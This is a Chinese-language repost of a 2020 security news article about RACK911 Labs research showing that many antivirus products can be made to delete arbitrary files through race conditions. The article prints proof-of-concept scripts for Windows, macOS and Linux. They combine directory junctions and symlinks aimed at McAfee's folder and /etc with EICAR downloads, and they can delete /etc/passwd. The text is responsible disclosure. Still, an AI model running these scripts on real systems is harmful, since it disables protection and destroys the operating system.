全球防病毒软件或成自身和系统自毁工具!

发布者:zx_763821
发布于:2020-04-23 22:21

​RACK911 Labs安全研究人员透露,几乎影响所有防病毒产品的漏洞可能已被用来禁用防病毒软件保护或使操作系统无法使用。



大多数防病毒软件都会对保存在磁盘上的未知文件执行“实时扫描”,如果认为可疑,则这些文件会被移至要隔离的安全位置,或者从系统中删除。


研究人员说,问题在于文件扫描和清理操作之间的时间间隔很小,而且几乎所有防病毒软件都以操作系统中最高权限执行操作。


“其中存在一个基本缺陷,因为文件操作(几乎)总是在最高级别执行,这为各种安全漏洞和各种竞争状况打开了大门。” RACK911 Labs指出。


在前面提到的防病毒扫描和清理操作之间的时间窗口中,恶意本地用户或恶意软件可能会执行竞争状态,从而滥用特权文件操作来禁用系统的安全保护或干扰操作系统。


RACK911 Labs提出了一种独特但简单的方法,即使用目录连接(Windows)和符号链接(macOS&Linux)将几乎所有防病毒软件变成自毁工具。


概念验证-针对Windows

概念验证– Windows:looprd /s /q C:\Users\Username\Desktop\exploitmkdir C:\Users\Username\Desktop\exploitecho X5O!P%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > C:\Users\Username\Desktop\exploit\EpSecApiLib.dllrd /s /q C:\Users\Username\Desktop\exploitmklink /J C:\Users\Username\Desktop\exploit “C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform”goto loop​*回显EICAR测试字符串的一种替代方法是将其下载到文件系统:​curl -k http://www.eicar.org/download/eicar.com.txt >> C:\ Users \ Username \ Desktop \ exploit \ EpSecApiLib.dll​在测试过程中,我们注意到某些防病毒软件会阻止从官方网站下载EICAR测试字符串,但是如果使用其他来源(如Pastebin.com)会成功。



Windows专有的目录连接将两个本地系统目录链接在一起,可以由任何用户执行,并且不需要管理员级别的特权。因此,在Windows上利用防病毒软件时,攻击者可以轻松利用它。



针对Windows 视频说明:

例如,针对Windows的McAfee Endpoint Security使用了上述概念证明来删除EpSecApiLib.dll文件。在我们的测试中,我们能够删除当前未使用的任何文件,包括干扰防病毒操作本身的能力。


本质上,几乎所有针对Windows的防病毒漏洞都是相似的。在某些情况下,我们必须实现超时值,以导致在下载EICAR测试字符串和创建目录连接之间存在延迟。与大多数比赛条件一样,计时是一切,但很容易就能轻松找出确切的数值。


概念验证– 针对macOS和Linux


在Linux和macOS上,符号链接或“符号链接”是一个快捷方式,其中一个文件指向另一个文件,并且可以由任何非特权用户执行。尽管此类链接也存在于Windows中,但它们要求在此操作系统上具有更高的特权。



说明– macOS和Linux

此漏洞被用于针对MacOS的Kaspersky Internet Security,并从备用来源(Pastebin)下载EICAR测试字符串,以绕过实时保护,该实时保护禁止从官方网站下载测试字符串。


下载测试字符串后,防病毒软件会立即将该文件检测为恶意软件,并尝试对其进行清理。在我们的测试中,我们能够识别出大约6到8秒的延迟,该延迟允许发生竞态条件,这可能导致符号链接攻击,由于该软件以root身份运行,因此导致所有文件被删除。


#!/bin/shrm -rf /Users/Username/exploit ; mkdir /Users/Username/exploitcurl -k https://pastebin.com/raw/jZJ6Ekzt > /Users/Username/exploit/passwdsleep 6rm -rf /Users/Username/exploit ; ln -s /etc /Users/Username/exploit


概念验证-针对Linux:


值得注意的是,以上针对macOS的概念证明也适用于某些Linux防病毒软件。在我们的测试中,鉴于大多数文件操作都是以root用户身份运行的,因此我们能够删除使防病毒软件或操作系统无法运行的重要文件。


利用Linux防病毒软件的好处之一是可以使用多种工具来帮助解决竞争状况。在我们的案例中,我们发现使用“ inotifywait”非常有帮助。例如,以下概念证明与Eset File Server Security背道而驰:


#!/bin/shrm -rf /home/user/exploit ; mkdir /home/user/exploit/wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwdwhile inotifywait -m “/home/user/exploit/passwd” | grep -m 5 “OPEN”dorm -rf /home/user/exploit ; ln -s /etc /home/user/exploitdone



以上概念验证的作用是监视已下载到名为passwd的文件的EICAR测试字符串。借助“ inotifywait”,可监视恶意passwd文件的OPEN文件操作。在第5次OPEN之后,实际的符号链接攻击发生,这将导致系统/ etc / passwd被删除,从而对操作系统造成拒绝服务攻击。


几乎影响所有防病毒软件

“在跨Windows,macOS和Linux的测试中,我们能够轻松删除与防病毒软件相关的重要文件,从而使该软件无效,甚至删除可能导致严重损坏而需要完全重新安装OS的关键操作系统文件,” RACK911实验室说。


研究人员还发现,在某些情况下,他们确定了可能允许特权升级的文件许可和所有权更改。



RACK911 Labs声称,已发现的已发现的漏洞几乎可以影响那里的所有防病毒软件,因此利用起来相当简单,“经验丰富的恶意软件作者将不会为概述的策略提供武器。”




攻击者需要弄清楚目录链接或符号链接操作的确切时间。但是,研究人员说,找出正确的时机对于本地恶意用户应该很容易。


研究人员指出:“在我们开发的某些防病毒软件中,计时根本不重要,而反复循环运行漏洞利用程序的简单循环声明就足以使防病毒软件自毁。”


RACK911 Labs发布了两种攻击情形的概念证明,以及一系列经过测试并被发现易受攻击的防病毒程序的清单.RACK911 Labs表示,它已于2018年秋季开始通知供应商,其中大多数都修补了产品,只有少数例外。


防病毒软件的当前状态

RACK911 Labs从2018年秋季开始通知供应商,到目前为止,我们已经报告了所有主要平台上的安全漏洞,这些漏洞影响着每个知名的防病毒软件供应商。考虑到有多少供应商易受攻击,我们相信,还有更多鲜为人知的产品容易受到此类攻击。


大多数防病毒供应商都已修复了其产品,但有一些不幸的例外。我们从事渗透测试已经很长时间了,从未想过由于不断缺乏更新并且完全无视修补安全漏洞的紧迫性,防病毒行业的同行将如此难以工作。


现在是2020年春季,我们联系的每个防病毒供应商都至少有6个月的时间来修复安全漏洞,我们认为现在是时候将研究成果发布给公众了。这篇文章中概述的漏洞利用并不难执行,现在是时候杀毒软件供应商加紧努力以保护其客户了!


例如,我们还发现macOS和Linux防病毒供应商一直在使用具有可预测文件名的临时目录,这可能会导致root特权升级。迄今为止,仍然有许多供应商以不安全的方式写入/ private / tmp(macOS)或/ tmp(Linux),以致于无法进行进一步的利用。我们不能对此施加足够的压力:远离tmp!


我们希望防病毒软件供应商能够重新考虑在用户可访问目录下如何进行文件操作。无论是Windows,macOS还是Linux,文件操作都必须以最低权限进行,以防止发生攻击,这一点非常重要。必须始终假设用户是恶意的,并且通过在用户可及的范围内执行特权文件操作,就为各种安全漏洞打开了大门!


参考:

https://www.rack911labs.com/research/exploiting-almost-every-antivirus-software/



共建网络安全命运共同体




声明:该文观点仅代表作者本人,转载请注明来自看雪